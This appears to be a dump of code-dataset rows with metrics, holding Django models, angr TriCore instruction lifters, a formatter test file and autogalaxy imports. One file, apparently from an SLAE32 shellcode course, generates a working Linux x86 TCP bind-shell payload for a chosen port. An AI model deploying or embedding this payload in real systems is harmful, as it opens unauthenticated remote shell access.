| 0.0001
| 0.227111
| 12,910
| 214
| 298
| 60.327103
| 0.856083
| 0.469171
| 0
| 0.025316
| 1
| 0
| 0.157473
| 0.025695
| 0
| 0
| 0
| 0
| 0
| 1
| 0.050633
| false
| 0.063291
| 0.075949
| 0.025316
| 0.341772
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
cec546ace260893dca0e7a31221b2b33f8a6df37
| 1,428
|
py
|
Python
|
cask/world/models.py
|
dcramer/cask-server
|
32535229a907479c3645aa34b75755d3e2b12dda
|
[
"Apache-2.0"
] | 2
|
2018-08-07T16:18:54.000Z
|
2020-11-18T15:04:41.000Z
|
cask/world/models.py
|
dcramer/cask-server
|
32535229a907479c3645aa34b75755d3e2b12dda
|
[
"Apache-2.0"
] | 2
|
2020-02-11T23:07:31.000Z
|
2020-06-05T18:56:19.000Z
|
cask/world/models.py
|
dcramer/cask-server
|
32535229a907479c3645aa34b75755d3e2b12dda
|
[
"Apache-2.0"
] | null | null | null |
from uuid import uuid4
from django.db import models
class Country(models.Model):
    """A country; top of the geographic hierarchy (City/Region/Location link here)."""
    # Client-side UUID primary key, hidden from forms/admin.
    id = models.UUIDField(primary_key=True, default=uuid4, editable=False)
    # Country names are globally unique.
    name = models.CharField(max_length=128, unique=True)
    created_at = models.DateTimeField(auto_now_add=True)

    def __str__(self):
        return self.name
class City(models.Model):
    """A city belonging to a Country."""
    # Client-side UUID primary key, hidden from forms/admin.
    id = models.UUIDField(primary_key=True, default=uuid4, editable=False)
    # NOTE(review): `unique=True` makes city names globally unique, not unique
    # per country (contrast Region's unique_together) — confirm this is intended.
    name = models.CharField(max_length=128, unique=True)
    country = models.ForeignKey(Country, on_delete=models.CASCADE)
    created_at = models.DateTimeField(auto_now_add=True)

    def __str__(self):
        return self.name
class Region(models.Model):
    """A named region within a Country; name is unique per country."""
    # Client-side UUID primary key, hidden from forms/admin.
    id = models.UUIDField(primary_key=True, default=uuid4, editable=False)
    name = models.CharField(max_length=128)
    country = models.ForeignKey(Country, on_delete=models.CASCADE)
    created_at = models.DateTimeField(auto_now_add=True)

    class Meta:
        # Names may repeat across countries but not within one.
        unique_together = (("name", "country"),)

    def __str__(self):
        return self.name
class Location(models.Model):
    """A specific place, tied to both a Country and a City."""
    # Client-side UUID primary key, hidden from forms/admin.
    id = models.UUIDField(primary_key=True, default=uuid4, editable=False)
    created_at = models.DateTimeField(auto_now_add=True)
    name = models.CharField(max_length=128)
    # Country is stored directly as well as via city; the two are not
    # constrained to agree at the database level.
    country = models.ForeignKey(Country, on_delete=models.CASCADE)
    city = models.ForeignKey(City, on_delete=models.CASCADE)

    def __str__(self):
        return self.name
| 30.382979
| 74
| 0.72619
| 187
| 1,428
| 5.326203
| 0.229947
| 0.052209
| 0.052209
| 0.076305
| 0.84739
| 0.84739
| 0.823293
| 0.794177
| 0.752008
| 0.752008
| 0
| 0.014286
| 0.166667
| 1,428
| 46
| 75
| 31.043478
| 0.822689
| 0
| 0
| 0.71875
| 0
| 0
| 0.007703
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.125
| false
| 0
| 0.0625
| 0.125
| 0.96875
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 9
|
ced4c6e575fd317df0a6b93c6c18a2c78ae18c1c
| 19,925
|
py
|
Python
|
angr_platforms/tricore/rrr_instr.py
|
shahinsba/angr-platforms
|
86f9ea90c396fb5561d0196a2d1a873e573b0294
|
[
"BSD-2-Clause"
] | null | null | null |
angr_platforms/tricore/rrr_instr.py
|
shahinsba/angr-platforms
|
86f9ea90c396fb5561d0196a2d1a873e573b0294
|
[
"BSD-2-Clause"
] | null | null | null |
angr_platforms/tricore/rrr_instr.py
|
shahinsba/angr-platforms
|
86f9ea90c396fb5561d0196a2d1a873e573b0294
|
[
"BSD-2-Clause"
] | null | null | null |
#!/usr/bin/env python3
""" rrr_instr.py
Implementation of RRR format instructions.
"""
from pyvex.lifting.util import Type, Instruction
from .rtl import * # pylint: disable=[wildcard-import, unused-wildcard-import]
from .logger import log_this
class RRR_CADD_Inst(Instruction):
    """Conditional Add (RRR format).

    op = 0x2B, op2 = 0x00.
    Writes D[a] + D[b] to D[c] when D[d] != 0, otherwise copies D[a];
    updates the PSW user status flags V, SV, AV, SAV.
    """
    name = 'RRR_CADD'
    op = "{0:04b}{1:04b}".format(2, 0xb)
    op2 = "{0:04b}".format(0)
    bin_format = op + 'b' * 4 + 'a' * 4 + op2 + 'i' * 4 + 'c' * 4 + 'd' * 4

    def parse(self, bitstrm):
        """Decode the a/b/c/d register fields from their bit strings."""
        fields = Instruction.parse(self, bitstrm)
        data = {key: int(fields[key], 2) for key in ('a', 'b', 'c', 'd')}
        log_this(self.name, data, hex(self.addr))
        return data

    def get_dst_reg(self):
        return "d%d" % self.data['c']

    def get_psw(self):
        return self.get("psw", Type.int_32)

    def get_d_d(self):
        return self.get("d%d" % self.data['d'], Type.int_32)

    def get_d_b(self):
        return self.get("d%d" % self.data['b'], Type.int_32)

    def get_d_a(self):
        return self.get("d%d" % self.data['a'], Type.int_32)

    def fetch_operands(self):
        return self.get_d_a(), self.get_d_b(), self.get_d_d()

    def compute_result(self, *args):
        d_a, d_b, d_d = args
        # Bit-mask form of the conditional select: all-ones when D[d] != 0.
        cond = extend_to_32_bits(d_d != 0)
        result = ((d_a + d_b) & cond) | (d_a & ~cond)
        # Update PSW user status bits: C, V, SV, AV, SAV.
        psw = self.get_psw()
        c = 0
        v = (result >> 32 != 0)
        sv = 0
        av = result[31] ^ result[30]
        sav = 0
        psw = set_usb(psw, c, v, sv, av, sav)
        self.put(psw, "psw")
        return result

    def commit_result(self, res):
        self.put(res, self.get_dst_reg())
class RRR_CADDN_Inst(Instruction):
    """Conditional Add-Not (RRR format).

    op = 0x2B, op2 = 0x01 (4-bits).
    Writes D[a] + D[b] to D[c] when D[d] == 0, otherwise copies D[a];
    updates the PSW user status flags V, SV, AV, SAV.
    """
    name = 'RRR_CADDN'
    op = "{0:04b}{1:04b}".format(2, 0xb)
    op2 = "{0:04b}".format(1)
    bin_format = op + 'b' * 4 + 'a' * 4 + op2 + 'i' * 4 + 'c' * 4 + 'd' * 4

    def parse(self, bitstrm):
        """Decode the a/b/c/d register fields from their bit strings."""
        fields = Instruction.parse(self, bitstrm)
        data = {key: int(fields[key], 2) for key in ('a', 'b', 'c', 'd')}
        log_this(self.name, data, hex(self.addr))
        return data

    def get_dst_reg(self):
        return "d%d" % self.data['c']

    def get_psw(self):
        return self.get("psw", Type.int_32)

    def get_d_d(self):
        return self.get("d%d" % self.data['d'], Type.int_32)

    def get_d_b(self):
        return self.get("d%d" % self.data['b'], Type.int_32)

    def get_d_a(self):
        return self.get("d%d" % self.data['a'], Type.int_32)

    def fetch_operands(self):
        return self.get_d_a(), self.get_d_b(), self.get_d_d()

    def compute_result(self, *args):
        d_a, d_b, d_d = args
        # Inverted condition vs CADD: select the sum when D[d] == 0.
        cond = extend_to_32_bits(d_d == 0)
        result = ((d_a + d_b) & cond) | (d_a & ~cond)
        # Update PSW user status bits: C, V, SV, AV, SAV.
        psw = self.get_psw()
        c = 0
        v = (result >> 32 != 0)
        sv = 0
        av = result[31] ^ result[30]
        sav = 0
        psw = set_usb(psw, c, v, sv, av, sav)
        self.put(psw, "psw")
        return result

    def commit_result(self, res):
        self.put(res, self.get_dst_reg())
class RRR_CSUB_Inst(Instruction):
    """Conditional Subtract (RRR format).

    op = 0x2B, op2 = 0x02.
    Writes D[a] - D[b] to D[c] when D[d] != 0, otherwise copies D[a];
    updates the PSW user status flags V, SV, AV, SAV.
    """
    name = 'RRR_CSUB'
    op = "{0:04b}{1:04b}".format(2, 0xb)
    op2 = "{0:04b}".format(2)
    bin_format = op + 'b' * 4 + 'a' * 4 + op2 + 'i' * 4 + 'c' * 4 + 'd' * 4

    def parse(self, bitstrm):
        """Decode the a/b/c/d register fields from their bit strings."""
        fields = Instruction.parse(self, bitstrm)
        data = {key: int(fields[key], 2) for key in ('a', 'b', 'c', 'd')}
        log_this(self.name, data, hex(self.addr))
        return data

    def get_dst_reg(self):
        return "d%d" % self.data['c']

    def get_psw(self):
        return self.get("psw", Type.int_32)

    def get_d_d(self):
        return self.get("d%d" % self.data['d'], Type.int_32)

    def get_d_b(self):
        return self.get("d%d" % self.data['b'], Type.int_32)

    def get_d_a(self):
        return self.get("d%d" % self.data['a'], Type.int_32)

    def fetch_operands(self):
        return self.get_d_a(), self.get_d_b(), self.get_d_d()

    def compute_result(self, *args):
        d_a, d_b, d_d = args
        # Bit-mask form of the conditional select: all-ones when D[d] != 0.
        cond = extend_to_32_bits(d_d != 0)
        result = ((d_a - d_b) & cond) | (d_a & ~cond)
        # Update PSW user status bits: C, V, SV, AV, SAV.
        psw = self.get_psw()
        c = 0
        v = (result >> 32 != 0)
        sv = 0
        av = result[31] ^ result[30]
        sav = 0
        psw = set_usb(psw, c, v, sv, av, sav)
        self.put(psw, "psw")
        return result

    def commit_result(self, res):
        self.put(res, self.get_dst_reg())
class RRR_CSUBN_Inst(Instruction):
    """Conditional Subtract-Not (RRR format).

    op = 0x2B, op2 = 0x03.
    Writes D[a] - D[b] to D[c] when D[d] == 0, otherwise copies D[a];
    updates the PSW user status flags V, SV, AV, SAV.
    """
    name = 'RRR_CSUBN'
    op = "{0:04b}{1:04b}".format(2, 0xb)
    op2 = "{0:04b}".format(3)
    bin_format = op + 'b' * 4 + 'a' * 4 + op2 + 'i' * 4 + 'c' * 4 + 'd' * 4

    def parse(self, bitstrm):
        """Decode the a/b/c/d register fields from their bit strings."""
        fields = Instruction.parse(self, bitstrm)
        data = {key: int(fields[key], 2) for key in ('a', 'b', 'c', 'd')}
        log_this(self.name, data, hex(self.addr))
        return data

    def get_dst_reg(self):
        return "d%d" % self.data['c']

    def get_psw(self):
        return self.get("psw", Type.int_32)

    def get_d_d(self):
        return self.get("d%d" % self.data['d'], Type.int_32)

    def get_d_b(self):
        return self.get("d%d" % self.data['b'], Type.int_32)

    def get_d_a(self):
        return self.get("d%d" % self.data['a'], Type.int_32)

    def fetch_operands(self):
        return self.get_d_a(), self.get_d_b(), self.get_d_d()

    def compute_result(self, *args):
        d_a, d_b, d_d = args
        # Inverted condition vs CSUB: select the difference when D[d] == 0.
        cond = extend_to_32_bits(d_d == 0)
        result = ((d_a - d_b) & cond) | (d_a & ~cond)
        # Update PSW user status bits: C, V, SV, AV, SAV.
        psw = self.get_psw()
        c = 0
        v = (result >> 32 != 0)
        sv = 0
        av = result[31] ^ result[30]
        sav = 0
        psw = set_usb(psw, c, v, sv, av, sav)
        self.put(psw, "psw")
        return result

    def commit_result(self, res):
        self.put(res, self.get_dst_reg())
class RRR_DVADJ_Inst(Instruction):
    """ Divide-Adjust instruction:
        op = 0x6B
        op2 = 0x0D (4-bits)
        User Status Flags: no change.
    """
    name = 'RRR_DVADJ'
    op = "{0}{1}".format(bin(6)[2:].zfill(4), bin(0xb)[2:].zfill(4))
    op2 = "{0}".format(bin(0xd)[2:].zfill(4))
    bin_format = op + 'b'*4 + 'a'*4 + op2 + '00' + 'i'*2 + 'c'*4 + 'd'*4

    def parse(self, bitstrm):
        # Only the b, c and d register fields are used by this instruction.
        data = Instruction.parse(self, bitstrm)
        data = {"b": int(data['b'], 2),
                "c": int(data['c'], 2),
                "d": int(data['d'], 2)}
        log_this(self.name, data, hex(self.addr))
        return data

    def get_d_d_2(self):
        # Upper word of the extended register pair E[d] (register d+1).
        return self.get("d{0}".format(self.data['d']+1), Type.int_32)

    def get_d_d(self):
        # Lower word of the extended register pair E[d].
        return self.get("d{0}".format(self.data['d']), Type.int_32)

    def get_d_b(self):
        return self.get("d{0}".format(self.data['b']), Type.int_32)

    def fetch_operands(self):
        return self.get_d_b(), self.get_d_d(), self.get_d_d_2()

    def compute_result(self, *args):
        # Writes the adjusted 64-bit quotient/remainder directly into the
        # register pair E[c] (low word to d[c], high word to d[c]+1); nothing
        # is returned, so no commit_result is defined on this class.
        d_b = args[0]
        d_d = args[1]
        d_d_2 = args[2]
        # NOTE(review): the Python `and` below short-circuits on the
        # truthiness of the first VexValue rather than building a bitwise
        # conjunction — confirm `&` was not intended here.
        result = ((d_d_2 == d_b) and (d_d_2[31])).ite(
            (d_d[31]).ite(d_d.cast_to(Type.int_64),
                          (d_d+1).cast_to(Type.int_64)),
            (d_d[31]).ite(((d_d_2).cast_to(Type.int_64)<<32)|(d_d+1).cast_to(Type.int_64),
                          ((d_d_2).cast_to(Type.int_64)<<32) | d_d.cast_to(Type.int_64))
        )
        self.put(result & 0xffffffff, "d{0}".format(self.data['c']))
        self.put(result >> 32, "d{0}".format(self.data['c']+1))
class RRR_DVSTEP_Inst(Instruction):
    """ Divide-Step instruction:
        op = 0x6B
        op2 = 0x0F (4-bits)
        User Status Flags: no change.
    """
    name = 'RRR_DVSTEP'
    op = "{0}{1}".format(bin(6)[2:].zfill(4), bin(0xb)[2:].zfill(4))
    op2 = "{0}".format(bin(0xf)[2:].zfill(4))
    bin_format = op + 'b'*4 + 'a'*4 + op2 + '00' + 'i'*2 + 'c'*4 + 'd'*4

    def parse(self, bitstrm):
        # Only the b, c and d register fields are used by this instruction.
        data = Instruction.parse(self, bitstrm)
        data = {"b": int(data['b'], 2),
                "c": int(data['c'], 2),
                "d": int(data['d'], 2)}
        log_this(self.name, data, hex(self.addr))
        return data

    def get_d_d_2(self):
        # Upper word of the extended register pair E[d] (register d+1).
        return self.get("d{0}".format(self.data['d']+1), Type.int_32)

    def get_d_d(self):
        # Lower word of the extended register pair E[d].
        return self.get("d{0}".format(self.data['d']), Type.int_32)

    def get_d_b(self):
        return self.get("d{0}".format(self.data['b']), Type.int_32)

    def fetch_operands(self):
        return self.get_d_b(), self.get_d_d(), self.get_d_d_2()

    def compute_result(self, *args):
        """Perform 8 signed divide steps on E[d] by D[b], writing the partial
        quotient to d[c] and the partial remainder to d[c]+1.

        The original body unrolled the 8 identical steps by copy/paste and
        recomputed the acceptance condition twice per step; this version runs
        the same step in a loop with the condition hoisted into a local —
        the emitted operations per step are unchanged.
        """
        d_b = args[0]
        d_d = args[1]
        d_d_2 = args[2]
        dividend_sign = d_d_2[31]  # E[d][63]
        divisor_sign = d_b[31]
        quotient_sign = dividend_sign != divisor_sign
        addend = (quotient_sign).ite(d_b, 0-d_b)
        dividend_quotient = d_d    # E[d][31:0]
        remainder = d_d_2          # E[d][63:32]
        # 8 identical non-restoring divide steps.
        for _ in range(8):
            remainder = (remainder << 1) | dividend_quotient[31]
            dividend_quotient <<= 1
            temp = remainder + addend
            # Accept the trial subtraction only when its sign matches the dividend's.
            accept = (temp.signed < 0) == dividend_sign
            remainder = accept.ite(temp, remainder)
            dividend_quotient = dividend_quotient | accept.ite(quotient_sign^1, quotient_sign)
        # put result into E[c]
        self.put(dividend_quotient & 0xffffffff, "d{0}".format(self.data['c']))
        self.put(remainder & 0xffffffff, "d{0}".format(self.data['c']+1))
class RRR_DVSTEP_U_Inst(Instruction):
    """ Divide-Step Unsigned instruction:
        op = 0x6B
        op2 = 0x0E (4-bits)
        User Status Flags: no change.

        Performs eight restoring-division steps on the dividend/remainder
        pair held in E[d], writing the updated pair to E[c].
    """
    name = 'RRR_DVSTEP.U'
    op = "{0}{1}".format(bin(6)[2:].zfill(4), bin(0xb)[2:].zfill(4))
    op2 = "{0}".format(bin(0xe)[2:].zfill(4))
    bin_format = op + 'b'*4 + 'a'*4 + op2 + '00' + 'i'*2 + 'c'*4 + 'd'*4

    def parse(self, bitstrm):
        raw = Instruction.parse(self, bitstrm)
        data = {field: int(raw[field], 2) for field in ('b', 'c', 'd')}
        log_this(self.name, data, hex(self.addr))
        return data

    def get_d_d_2(self):
        # high word of the pair: E[d][63:32]
        return self.get("d{0}".format(self.data['d']+1), Type.int_32)

    def get_d_d(self):
        # low word of the pair: E[d][31:0]
        return self.get("d{0}".format(self.data['d']), Type.int_32)

    def get_d_b(self):
        # divisor register D[b]
        return self.get("d{0}".format(self.data['b']), Type.int_32)

    def fetch_operands(self):
        return self.get_d_b(), self.get_d_d(), self.get_d_d_2()

    def compute_result(self, *args):
        divisor = args[0]
        dividend_quotient = args[1]   # E[d][31:0]
        remainder = args[2]           # E[d][63:32]
        # Eight identical divide steps; a loop replaces the original
        # hand-unrolled iterations 0 through 7.
        for _ in range(8):
            # shift the next dividend bit into the remainder
            remainder = (remainder << 1) | dividend_quotient[31]
            dividend_quotient <<= 1
            trial = (remainder & 0xffffffff) - divisor
            underflow = trial.signed < 0
            # keep the old remainder when the trial subtraction underflowed
            remainder = underflow.ite(remainder, trial)
            # quotient bit is 1 exactly when the subtraction succeeded
            dividend_quotient = dividend_quotient | (underflow ^ 1)
        # put result into E[c]
        self.put(dividend_quotient & 0xffffffff, "d{0}".format(self.data['c']))
        self.put(remainder & 0xffffffff, "d{0}".format(self.data['c']+1))
class RRR_SEL_Inst(Instruction):
    """ Select instruction.
        op = 0x2B
        op2 = 0x04 (4-bits)
        User Status Flags: no change.

        Writes D[a] to D[c] when D[d] is non-zero, otherwise D[b].
    """
    name = 'RRR_SEL'
    op = "{0}{1}".format(bin(2)[2:].zfill(4), bin(0xb)[2:].zfill(4))
    op2 = "{0}".format(bin(4)[2:].zfill(4))
    bin_format = op + 'b'*4 + 'a'*4 + op2 + 'i'*4 + 'c'*4 + 'd'*4

    def parse(self, bitstrm):
        raw = Instruction.parse(self, bitstrm)
        data = {field: int(raw[field], 2) for field in ('a', 'b', 'c', 'd')}
        log_this(self.name, data, hex(self.addr))
        return data

    def get_dst_reg(self):
        return "d{0}".format(self.data['c'])

    def get_d_d(self):
        return self.get("d{0}".format(self.data['d']), Type.int_32)

    def get_d_b(self):
        return self.get("d{0}".format(self.data['b']), Type.int_32)

    def get_d_a(self):
        return self.get("d{0}".format(self.data['a']), Type.int_32)

    def fetch_operands(self):
        return self.get_d_a(), self.get_d_b(), self.get_d_d()

    def compute_result(self, *args):
        d_a, d_b, d_d = args
        # pick D[a] when the condition register is non-zero, else D[b]
        return self.ite(d_d != 0, d_a, d_b)

    def put(self, val, reg):
        arch = self.irsb_c.irsb.arch
        self.irsb_c.put(val, self._lookup_register(arch, reg))

    def commit_result(self, res):
        self.put(res, self.get_dst_reg())
class RRR_SELN_Inst(Instruction):
    """ Select-Not instruction.
        op = 0x2B
        op2 = 0x05 (4-bits)
        User Status Flags: no change.

        Writes D[a] to D[c] when D[d] is zero, otherwise D[b]
        (the inverted-condition twin of RRR_SEL).
    """
    name = 'RRR_SELN'
    op = "{0}{1}".format(bin(2)[2:].zfill(4), bin(0xb)[2:].zfill(4))
    op2 = "{0}".format(bin(5)[2:].zfill(4))
    bin_format = op + 'b'*4 + 'a'*4 + op2 + 'i'*4 + 'c'*4 + 'd'*4

    def parse(self, bitstrm):
        raw = Instruction.parse(self, bitstrm)
        data = {field: int(raw[field], 2) for field in ('a', 'b', 'c', 'd')}
        log_this(self.name, data, hex(self.addr))
        return data

    def get_dst_reg(self):
        return "d{0}".format(self.data['c'])

    def get_d_d(self):
        return self.get("d{0}".format(self.data['d']), Type.int_32)

    def get_d_b(self):
        return self.get("d{0}".format(self.data['b']), Type.int_32)

    def get_d_a(self):
        return self.get("d{0}".format(self.data['a']), Type.int_32)

    def fetch_operands(self):
        return self.get_d_a(), self.get_d_b(), self.get_d_d()

    def compute_result(self, *args):
        d_a, d_b, d_d = args
        # pick D[a] when the condition register is zero, else D[b]
        return self.ite(d_d == 0, d_a, d_b)

    def put(self, val, reg):
        arch = self.irsb_c.irsb.arch
        self.irsb_c.put(val, self._lookup_register(arch, reg))

    def commit_result(self, res):
        self.put(res, self.get_dst_reg())
| 33.543771
| 120
| 0.54936
| 2,904
| 19,925
| 3.607438
| 0.048554
| 0.030928
| 0.041237
| 0.06491
| 0.921249
| 0.914185
| 0.913039
| 0.909889
| 0.909889
| 0.885166
| 0
| 0.045856
| 0.277641
| 19,925
| 593
| 121
| 33.600337
| 0.681998
| 0.059072
| 0
| 0.890777
| 0
| 0
| 0.027015
| 0
| 0
| 0
| 0.009023
| 0
| 0
| 1
| 0.174757
| false
| 0
| 0.007282
| 0.11165
| 0.43932
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
|
0
| 8
|
0c98650f8339c56728442cdca93345d268c045c7
| 2,468
|
py
|
Python
|
tests/import_spacing.py
|
peterbe/black
|
61a8d401c797240c0bc5313a9ff068bb269479a5
|
[
"MIT"
] | 3
|
2018-11-06T14:54:37.000Z
|
2021-06-20T19:38:24.000Z
|
tests/import_spacing.py
|
peterbe/black
|
61a8d401c797240c0bc5313a9ff068bb269479a5
|
[
"MIT"
] | null | null | null |
tests/import_spacing.py
|
peterbe/black
|
61a8d401c797240c0bc5313a9ff068bb269479a5
|
[
"MIT"
] | 1
|
2020-04-08T00:25:03.000Z
|
2020-04-08T00:25:03.000Z
|
"""The asyncio package, tracking PEP 3156."""
# flake8: noqa
from logging import (
ERROR,
)
import sys
# This relies on each of the submodules having an __all__ variable.
from .base_events import *
from .coroutines import *
from .events import * # comment here
from .futures import *
from .locks import * # comment here
from .protocols import *
from ..runners import * # comment here
from ..queues import *
from ..streams import *
from some_library import (
Just, Enough, Libraries, To, Fit, In, This, Nice, Split, Which, We, No, Longer, Use
)
from name_of_a_company.extremely_long_project_name.component.ttypes import CuteLittleServiceHandlerFactoryyy
from name_of_a_company.extremely_long_project_name.extremely_long_component_name.ttypes import *
from .a.b.c.subprocess import *
from . import (tasks)
from . import (A, B, C)
from . import SomeVeryLongNameAndAllOfItsAdditionalLetters1, \
SomeVeryLongNameAndAllOfItsAdditionalLetters2
__all__ = (
base_events.__all__
+ coroutines.__all__
+ events.__all__
+ futures.__all__
+ locks.__all__
+ protocols.__all__
+ runners.__all__
+ queues.__all__
+ streams.__all__
+ tasks.__all__
)
# output
"""The asyncio package, tracking PEP 3156."""
# flake8: noqa
from logging import ERROR
import sys
# This relies on each of the submodules having an __all__ variable.
from .base_events import *
from .coroutines import *
from .events import * # comment here
from .futures import *
from .locks import * # comment here
from .protocols import *
from ..runners import * # comment here
from ..queues import *
from ..streams import *
from some_library import (
Just,
Enough,
Libraries,
To,
Fit,
In,
This,
Nice,
Split,
Which,
We,
No,
Longer,
Use,
)
from name_of_a_company.extremely_long_project_name.component.ttypes import (
CuteLittleServiceHandlerFactoryyy
)
from name_of_a_company.extremely_long_project_name.extremely_long_component_name.ttypes import *
from .a.b.c.subprocess import *
from . import tasks
from . import A, B, C
from . import (
SomeVeryLongNameAndAllOfItsAdditionalLetters1,
SomeVeryLongNameAndAllOfItsAdditionalLetters2,
)
__all__ = (
base_events.__all__
+ coroutines.__all__
+ events.__all__
+ futures.__all__
+ locks.__all__
+ protocols.__all__
+ runners.__all__
+ queues.__all__
+ streams.__all__
+ tasks.__all__
)
| 21.840708
| 108
| 0.722853
| 291
| 2,468
| 5.676976
| 0.223368
| 0.096852
| 0.061743
| 0.076271
| 0.996368
| 0.996368
| 0.996368
| 0.996368
| 0.996368
| 0.996368
| 0
| 0.007067
| 0.197326
| 2,468
| 112
| 109
| 22.035714
| 0.826855
| 0.114668
| 0
| 0.564706
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.423529
| 0
| 0.423529
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
0b4560cfa78ddc67b269624087a65c2128a610ce
| 631
|
py
|
Python
|
Assignment1/wrapper_script.py
|
sajithshetty/SLAE32
|
1171a9e3ef78786e069226fcd31ad6d5f2a4057b
|
[
"CC0-1.0"
] | null | null | null |
Assignment1/wrapper_script.py
|
sajithshetty/SLAE32
|
1171a9e3ef78786e069226fcd31ad6d5f2a4057b
|
[
"CC0-1.0"
] | null | null | null |
Assignment1/wrapper_script.py
|
sajithshetty/SLAE32
|
1171a9e3ef78786e069226fcd31ad6d5f2a4057b
|
[
"CC0-1.0"
] | null | null | null |
#!/usr/bin/python
"""Print a Linux x86 TCP bind-shell payload as a C-style escaped string.

Usage: ./script.py <port number>
example: ./script.py 4444

The port from argv[1] is network-byte-order packed and spliced into the
shellcode at the spot where the original assembly pushed the port word.

Fixed: the original used the Python-2-only print statement and relied on
py2 str/bytes equivalence; this version runs under Python 3 (the payload
is kept as bytes end to end) and emits the exact same output.
"""
import struct
import sys


def build_bind_shell(port):
    """Return the bind-shell shellcode (bytes) with *port* patched in."""
    packed = struct.pack("!H", port)  # port, big-endian 16-bit
    return (
        b"\x31\xc0\x31\xdb\x50\xb0\x66\xb3\x01\x53\x6a\x02\x89\xe1\xcd\x80"
        b"\x89\xc6\x52\x66\x68" + packed +
        b"\x66\x6a\x02\x89\xe1\xb0\x66\xb3\x02\x6a\x10\x51\x56\x89\xe1\xcd\x80"
        b"\xb0\x66\xb3\x04\x52\x56\x89\xe1\xcd\x80"
        b"\xb0\x66\xb3\x05\x52\x52\x56\x89\xe1\xcd\x80"
        b"\x89\xc3\x31\xc9\xb1\x03\xfe\xc9\xb0\x3f\xcd\x80\x75\xf8"
        b"\xb0\x0b\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53"
        b"\x89\xe1\xcd\x80"
    )


def main():
    """Read the port from argv[1] and print the payload as "\\x.." bytes."""
    shellcode = build_bind_shell(int(sys.argv[1]))
    print('"' + ''.join('\\x%02x' % b for b in shellcode) + '";')


if __name__ == "__main__":
    main()
| 35.055556
| 295
| 0.681458
| 133
| 631
| 3.218045
| 0.496241
| 0.084112
| 0.10514
| 0.140187
| 0.203271
| 0.161215
| 0.11215
| 0.11215
| 0
| 0
| 0
| 0.25
| 0.074485
| 631
| 17
| 296
| 37.117647
| 0.482877
| 0.10935
| 0
| 0
| 0
| 0.285714
| 0.694097
| 0.67263
| 0
| 1
| 0
| 0
| 0
| 0
| null | null | 0
| 0.285714
| null | null | 0.142857
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0b6e3b69bb3965ed6ea125cfdc7b692c8fbdbc4f
| 308
|
py
|
Python
|
autogalaxy/aggregator/__init__.py
|
Jammy2211/PyAutoModel
|
02f54e71900de9ec12c9070dc00a4bd001b25afa
|
[
"MIT"
] | 4
|
2019-10-29T13:27:23.000Z
|
2020-03-24T11:13:35.000Z
|
autogalaxy/aggregator/__init__.py
|
Jammy2211/PyAutoModel
|
02f54e71900de9ec12c9070dc00a4bd001b25afa
|
[
"MIT"
] | null | null | null |
autogalaxy/aggregator/__init__.py
|
Jammy2211/PyAutoModel
|
02f54e71900de9ec12c9070dc00a4bd001b25afa
|
[
"MIT"
] | 3
|
2020-02-12T10:29:59.000Z
|
2020-03-24T11:13:53.000Z
|
from autogalaxy.aggregator.plane import PlaneAgg
from autogalaxy.aggregator.imaging import ImagingAgg
from autogalaxy.aggregator.fit_imaging import FitImagingAgg
from autogalaxy.aggregator.interferometer import InterferometerAgg
from autogalaxy.aggregator.fit_interferometer import FitInterferometerAgg
| 51.333333
| 74
| 0.886364
| 32
| 308
| 8.46875
| 0.40625
| 0.258303
| 0.442804
| 0.199262
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.081169
| 308
| 5
| 75
| 61.6
| 0.957597
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
0b96e17ade049b24c55fed38fb11489973b00044
| 16,763
|
py
|
Python
|
NASA/Python_codes/drivers/05_SOSDetection_table/03_d_train_tables_JFD.py
|
HNoorazar/Kirti
|
fb7108dac1190774bd90a527aaa8a3cb405f127d
|
[
"MIT"
] | null | null | null |
NASA/Python_codes/drivers/05_SOSDetection_table/03_d_train_tables_JFD.py
|
HNoorazar/Kirti
|
fb7108dac1190774bd90a527aaa8a3cb405f127d
|
[
"MIT"
] | null | null | null |
NASA/Python_codes/drivers/05_SOSDetection_table/03_d_train_tables_JFD.py
|
HNoorazar/Kirti
|
fb7108dac1190774bd90a527aaa8a3cb405f127d
|
[
"MIT"
] | null | null | null |
####
